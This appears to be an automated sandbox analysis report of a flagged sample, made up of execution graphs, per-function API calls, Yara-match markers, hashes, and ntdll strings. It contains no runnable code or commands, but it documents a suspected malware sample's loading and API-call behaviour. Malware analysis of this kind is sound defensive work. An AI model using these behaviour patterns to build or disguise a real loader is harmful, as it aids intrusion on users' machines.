                                                                      execution_graph 92669 42c2c3 92670 42c2e0 92669->92670 92673 1912df0 LdrInitializeThunk 92670->92673 92671 42c308 92673->92671 92674 424fa3 92675 424fbf 92674->92675 92676 424fe7 92675->92676 92677 424ffb 92675->92677 92678 42ccb3 NtClose 92676->92678 92684 42ccb3 92677->92684 92680 424ff0 92678->92680 92681 425004 92687 42ee13 RtlAllocateHeap 92681->92687 92683 42500f 92685 42cccd 92684->92685 92686 42ccde NtClose 92685->92686 92686->92681 92687->92683 92785 425333 92789 42534c 92785->92789 92786 425394 92787 42ecf3 RtlFreeHeap 92786->92787 92788 4253a1 92787->92788 92789->92786 92790 4253d4 92789->92790 92792 4253d9 92789->92792 92791 42ecf3 RtlFreeHeap 92790->92791 92791->92792 92793 42fd93 92794 42fda3 92793->92794 92795 42fda9 92793->92795 92798 42edd3 92795->92798 92797 42fdcf 92801 42cfb3 92798->92801 92800 42edee 92800->92797 92802 42cfcd 92801->92802 92803 42cfde RtlAllocateHeap 92802->92803 92803->92800 92804 1912b60 LdrInitializeThunk 92688 414063 92689 414082 92688->92689 92691 42cf23 92688->92691 92692 42cf40 92691->92692 92695 1912c70 LdrInitializeThunk 92692->92695 92693 42cf68 92693->92689 92695->92693 92805 4145d3 92806 4145ec 92805->92806 92811 417d83 92806->92811 92808 41460a 92809 414656 92808->92809 92810 414643 PostThreadMessageW 92808->92810 92810->92809 92812 417da7 92811->92812 92813 417de3 LdrLoadDll 92812->92813 92814 417dae 92812->92814 92813->92814 92814->92808 92815 41b893 92816 41b8d7 92815->92816 92817 41b8f8 92816->92817 92818 42ccb3 NtClose 92816->92818 92818->92817 92819 41ea93 92820 41eab9 92819->92820 92824 41ebad 92820->92824 92825 42fec3 92820->92825 92822 41eb4e 92823 42c313 LdrInitializeThunk 92822->92823 92822->92824 92823->92824 92826 42fe33 92825->92826 92827 42fe90 92826->92827 92828 42edd3 RtlAllocateHeap 92826->92828 92827->92822 92829 42fe6d 92828->92829 92830 42ecf3 RtlFreeHeap 92829->92830 92830->92827 92696 4019e4 92697 401a01 92696->92697 92700 430263 92697->92700 92703 42e8b3 92700->92703 92704 42e8d9 92703->92704 92715 407353 92704->92715 92706 42e8ef 92707 401a65 92706->92707 92718 41b6a3 92706->92718 92709 42e90e 92710 42e923 92709->92710 92733 42d053 92709->92733 92729 428853 92710->92729 92713 42e93d 92714 42d053 ExitProcess 92713->92714 92714->92707 92717 407360 92715->92717 92736 416a33 92715->92736 92717->92706 92719 41b6cf 92718->92719 92760 41b593 92719->92760 92722 41b714 92724 41b730 92722->92724 92727 42ccb3 NtClose 92722->92727 92723 41b6fc 92725 41b707 92723->92725 92726 42ccb3 NtClose 92723->92726 92724->92709 92725->92709 92726->92725 92728 41b726 92727->92728 92728->92709 92731 4288b5 92729->92731 92730 4288c2 92730->92713 92731->92730 92771 418bf3 92731->92771 92734 42d06d 92733->92734 92735 42d07e ExitProcess 92734->92735 92735->92710 92737 416a4d 92736->92737 92739 416a66 92737->92739 92740 42d6d3 92737->92740 92739->92717 92741 42d6ed 92740->92741 92742 42d71c 92741->92742 92747 42c313 92741->92747 92742->92739 92748 42c32d 92747->92748 92754 1912c0a 92748->92754 92749 42c359 92751 42ecf3 92749->92751 92757 42d003 92751->92757 92753 42d78c 92753->92739 92755 1912c11 92754->92755 92756 1912c1f LdrInitializeThunk 92754->92756 92755->92749 92756->92749 92758 42d01d 92757->92758 92759 42d02e RtlFreeHeap 92758->92759 92759->92753 92761 41b5ad 92760->92761 92765 41b689 92760->92765 92766 42c3b3 92761->92766 92764 42ccb3 NtClose 92764->92765 92765->92722 92765->92723 92767 42c3cd 92766->92767 92770 19135c0 LdrInitializeThunk 92767->92770 92768 41b67d 92768->92764 92770->92768 92772 418bf6 92771->92772 92778 41911b 92772->92778 92779 414243 92772->92779 92774 418d4a 92775 42ecf3 RtlFreeHeap 92774->92775 92774->92778 92776 418d62 92775->92776 92777 42d053 ExitProcess 92776->92777 92776->92778 92777->92778 92778->92730 92780 414263 92779->92780 92782 4142cc 92780->92782 92784 41b9b3 RtlFreeHeap LdrInitializeThunk 92780->92784 92782->92774 92783 4142c2 92783->92774 92784->92783 92831 419335 92832 42ccb3 NtClose 92831->92832 92833 41933f 92832->92833

                                                                      Executed Functions

                                                                      Function 00417D83 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 253 417d83-417dac call 42f8d3 256 417db2-417dc0 call 42fed3 253->256 257 417dae-417db1 253->257 260 417dd0-417de1 call 42e383 256->260 261 417dc2-417dcd call 430173 256->261 266 417de3-417df7 LdrLoadDll 260->266 267 417dfa-417dfd 260->267 261->260 266->267
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                      • Instruction ID: 88b9ef28133dc456cab6c81c5f600716b01c30102915f9fd8f3ec612534eff34
                                                                      • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                      • Instruction Fuzzy Hash: 23011EB5E0020DABDF10DAE5DC42FEEB3789F54308F0081AAE90897241F635EB598B95
                                                                      Function 0042CCB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 278 42ccb3-42ccec call 404623 call 42dea3 NtClose
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction ID: d46bfabfc098e6d5a2aad821b6b2a61ea91c21e50ceafb7c4f345b9124cf626d
                                                                      • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction Fuzzy Hash: 98E026366006043BC210FA6ADC01FD7776CDFC5B10F000819FA0867242C7B4B90087F4
                                                                      Function 01912B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 03e5d149f0a492724bdad5baa0cad8d0724436217b2d51b680fecdaef45abbd0
                                                                      • Instruction ID: cf161f8a0dd1b544053c4b740271b2a78ca067ee48413f9388d4d72b3c3207ac
                                                                      • Opcode Fuzzy Hash: 03e5d149f0a492724bdad5baa0cad8d0724436217b2d51b680fecdaef45abbd0
                                                                      • Instruction Fuzzy Hash: 9C90026120251003410571584419616808E97E0201B55C021E1054590DC92589916225
                                                                      Function 01912DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f81a341a6bf3e2b9164e9cd5fa5f86826af621607114e4d243c5d5eb9d46717f
                                                                      • Instruction ID: baf5deb4a7f84f471db266c9c2581a300fd3129a5b9b433d70d3b52ce06b2fd4
                                                                      • Opcode Fuzzy Hash: f81a341a6bf3e2b9164e9cd5fa5f86826af621607114e4d243c5d5eb9d46717f
                                                                      • Instruction Fuzzy Hash: 0B90023120151413D11171584509707408D97D0241F95C412E0464558DDA568A52A221
                                                                      Function 01912C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7a4dc26fda5c664c41d58c644a0920d0939a25c82e68654aa81dffab7e7a97ad
                                                                      • Instruction ID: dbc3fd10517707b897eb5eb6b1e1b2bd1402d4896aadd1059369a1bac249fece
                                                                      • Opcode Fuzzy Hash: 7a4dc26fda5c664c41d58c644a0920d0939a25c82e68654aa81dffab7e7a97ad
                                                                      • Instruction Fuzzy Hash: F990023120159802D1107158840974A408997D0301F59C411E4464658DCA9589917221
                                                                      Function 019135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 105e7ec0be25e0d70b81f04fa8c97eaa9fbd808594feabef1e7017a783dc0854
                                                                      • Instruction ID: 694fc5b407ec07e70ba16619ba87763f1e99defc6aef2b60cea7fd68aec47eba
                                                                      • Opcode Fuzzy Hash: 105e7ec0be25e0d70b81f04fa8c97eaa9fbd808594feabef1e7017a783dc0854
                                                                      • Instruction Fuzzy Hash: 0F90023160561402D10071584519706508997D0201F65C411E0464568DCB958A5166A2
                                                                      Function 004145A8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4145a8-4145ae 1 4145b0-4145c4 0->1 2 414628-414641 0->2 3 414663-414668 2->3 4 414643-414654 PostThreadMessageW 2->4 4->3 5 414656-414660 4->5 5->3
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 04I_$086604I_P$086604I_P
                                                                      • API String ID: 1836367815-762223272
                                                                      • Opcode ID: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                      • Instruction ID: 7364b2b1fcad01788479a4f9307d5c54d4abcef8cf499afca70ead5bc7e82b5e
                                                                      • Opcode Fuzzy Hash: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                      • Instruction Fuzzy Hash: 59F02B32B0534C75D71186549C41FFEBB68DF82B18F0402DAE904AA140D679190687D5
                                                                      Function 004145C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 086604I_P$086604I_P
                                                                      • API String ID: 1836367815-368392577
                                                                      • Opcode ID: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                      • Instruction ID: 3b1c6bc8a4282993d6e4a2e48ae66367294b2a1ba01f1a571c31a1870c0ceae8
                                                                      • Opcode Fuzzy Hash: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                      • Instruction Fuzzy Hash: 25112972D8021C76E711A6919C42FDF7B7C8F81B58F404169FA047B2C0D6B85A0687E9
                                                                      Function 004145D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 086604I_P$086604I_P
                                                                      • API String ID: 1836367815-368392577
                                                                      • Opcode ID: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                      • Instruction ID: 0fb9ab954ef8db3f32d4c25afcf056a5d19c50fc272c64c350af8f6a8d246f1f
                                                                      • Opcode Fuzzy Hash: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                      • Instruction Fuzzy Hash: CA01D671E4025876EB21A6919C42FDF7B7C9F81B58F014169FA047B2C0D6BC5A0687E9
                                                                      Function 00417E46 Relevance: 1.6, APIs: 1, Instructions: 90libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 231 417e46-417e49 232 417dd8-417de1 231->232 233 417e4b-417e52 231->233 234 417de3-417df7 LdrLoadDll 232->234 235 417dfa-417dfd 232->235 236 417e54-417e68 233->236 237 417e3a-417e3c 233->237 234->235 240 417e69-417e7a 236->240 238 417e3f-417e41 237->238 239 417e3e 237->239 241 417e01-417e02 238->241 242 417e43-417e44 238->242 239->238 244 417e7b-417e9b 240->244 244->244 245 417e9d-417e9f 244->245 246 417ea1 245->246 247 417eff-417f3e call 42f933 call 42bcb3 245->247 246->240 248 417ea3-417ea5 246->248 248->247
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                      • Instruction ID: 6fda3640aeabacdf2414ac2a0c0e5c28ef028ee1734c6d5c1d6e7c4e4c655ad8
                                                                      • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                      • Instruction Fuzzy Hash: 0021BE7554D3895ACB11DBA4CC80BDEBB74DF46328F0443DEE444CF282D664D94583D5
                                                                      Function 0042D003 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 273 42d003-42d044 call 404623 call 42dea3 RtlFreeHeap
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,004175E7,000000F4), ref: 0042D03F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                      • Instruction ID: 480c2476483c24a98dc1ccd4d3f8387b92b9bc50a10ea559d801330f157754dd
                                                                      • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                      • Instruction Fuzzy Hash: CCE065B66046147FE710EFA9EC41E9B33ACEFC9710F00041AFA08A7241D778B9108AB9
                                                                      Function 0042CFB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 268 42cfb3-42cff4 call 404623 call 42dea3 RtlAllocateHeap
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,0041EB4E,?,?,00000000,?,0041EB4E,?,?,?), ref: 0042CFEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                      • Instruction ID: dc73a00d5b2d417b2c46dafea40d9adc71060332ee157e8bfc2b2fc429177c5c
                                                                      • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                      • Instruction Fuzzy Hash: 2DE06DB66042047BD610EE59EC41E9B33ACDFC9710F000819F908A7241D675BA118BB9
                                                                      Function 0042D053 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 283 42d053-42d08c call 404623 call 42dea3 ExitProcess
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,B9F6A3FE,?,?,B9F6A3FE), ref: 0042D087
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_400000_NFhRxwbegd.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                      • Instruction ID: 7a9833e9e4d947a3999cb396ff3879e5195884ea37e196f788b44d0b0899353c
                                                                      • Opcode Fuzzy Hash: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                      • Instruction Fuzzy Hash: D2E04F722406147BC210FA5ADC02F9B775CDBC5715F10845AFA086B241D7B9791587A8
                                                                      Function 01912C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 288 1912c0a-1912c0f 289 1912c11-1912c18 288->289 290 1912c1f-1912c26 LdrInitializeThunk 288->290
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d7c694eed7b935ce402346fa28afc3d032a7a45876c8948b6b706757a62b78c5
                                                                      • Instruction ID: 08ccac128853d397caaed8ab36b4c91aa60909fa3c3b13adb0668d1c8efe39a8
                                                                      • Opcode Fuzzy Hash: d7c694eed7b935ce402346fa28afc3d032a7a45876c8948b6b706757a62b78c5
                                                                      • Instruction Fuzzy Hash: 94B09B71D015D5C6DA11F764460D717794477D0701F25C061D3070641F4738C1D1E275

                                                                      Non-executed Functions

                                                                      Function 01952349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2160512332
                                                                      • Opcode ID: 89fd1eada63b3369be850601884bfad8b868019af5c691248fff873016abb4fc
                                                                      • Instruction ID: 4aba78b3c738e0fd14913699a1501f8395b412b07e232b58d1e86e34086b92ee
                                                                      • Opcode Fuzzy Hash: 89fd1eada63b3369be850601884bfad8b868019af5c691248fff873016abb4fc
                                                                      • Instruction Fuzzy Hash: 88927B71608342EFE761DF28C880B6AB7E8BB84754F14492DFE98E7250D770E944CB92
                                                                      Function 01908620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Critical section debug info address, xrefs: 0194541F, 0194552E
                                                                      • corrupted critical section, xrefs: 019454C2
                                                                      • Thread identifier, xrefs: 0194553A
                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019454CE
                                                                      • Invalid debug info address of this critical section, xrefs: 019454B6
                                                                      • Critical section address., xrefs: 01945502
                                                                      • Address of the debug info found in the active list., xrefs: 019454AE, 019454FA
                                                                      • 8, xrefs: 019452E3
                                                                      • Critical section address, xrefs: 01945425, 019454BC, 01945534
                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019454E2
                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01945543
                                                                      • undeleted critical section in freed memory, xrefs: 0194542B
                                                                      • double initialized or corrupted critical section, xrefs: 01945508
                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0194540A, 01945496, 01945519
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                      • API String ID: 0-2368682639
                                                                      • Opcode ID: 290e7bbce85eb5b8b6b4a0a5fec4a1e9d2c8d7610aca5b8a6f95a89294f63626
                                                                      • Instruction ID: 4f4bf7bac8e0badc500312c608cad802d11931ec72dd092f0939a6d32c9d7f9b
                                                                      • Opcode Fuzzy Hash: 290e7bbce85eb5b8b6b4a0a5fec4a1e9d2c8d7610aca5b8a6f95a89294f63626
                                                                      • Instruction Fuzzy Hash: 13817EB1A41348EFEB20CF99C885FAEBBB9AB49B14F114119F509F7340D375AA41CB90
                                                                      Function 019029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01942602
                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01942409
                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0194261F
                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01942624
                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01942506
                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01942498
                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019422E4
                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019425EB
                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019424C0
                                                                      • @, xrefs: 0194259B
                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01942412
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                      • API String ID: 0-4009184096
                                                                      • Opcode ID: fac8c182449f1a354ebbc9cee86d3dd42e08a77283dfd944a28d6fc84ee483cb
                                                                      • Instruction ID: 4bf91154bf9973b251cac2014de637c1a20c62e78c2fb14e9b5273aad24a3364
                                                                      • Opcode Fuzzy Hash: fac8c182449f1a354ebbc9cee86d3dd42e08a77283dfd944a28d6fc84ee483cb
                                                                      • Instruction Fuzzy Hash: 2E026EB1D002299FDB21DB54CD84FEAB7B8AB55714F4041EAA60DA7281EB309F84CF59
                                                                      Function 01978B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                      • API String ID: 0-2515994595
